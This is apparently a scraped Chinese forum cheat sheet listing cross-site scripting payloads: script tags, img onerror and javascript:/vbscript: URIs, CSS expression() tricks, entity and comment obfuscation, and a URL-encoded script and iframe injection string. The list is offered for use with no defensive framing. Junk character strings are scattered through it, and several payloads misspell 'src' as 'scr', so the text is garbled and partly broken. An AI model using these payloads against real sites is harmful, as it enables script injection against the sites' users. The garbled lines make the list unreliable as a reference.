xss

admin

<script>alert("跨站")</script>    (最常用）
<img scr=javascript:alert("跨站")></img>
7 Y9 q* B: a' D9 _* {<img scr="javascrip&#116&#58 alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格）
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
/ k6 ~9 s3 `' ]+ {) W. m<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释）
3 z! A& u$ q% ^# b<img src=vbscript:msgbox ("xss")></img>
5 B& B- f7 L  {4 Q! x<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
4 ~% i# W* K' l1 _<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#ｘ0065；xpression (alert('xss'))}></div>
7 _1 w% u/ Q' B) ~! _  u# ^& cunicode <div style="{left:expRessioN (alert('xss'))}">
* L  {$ t  h6 N, f
8 U  }+ x+ ^  ]3 M% f8 T"]}%3Cscript%3Ealert('我又来啦！.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
+ c- |( y, T; t# a' N# D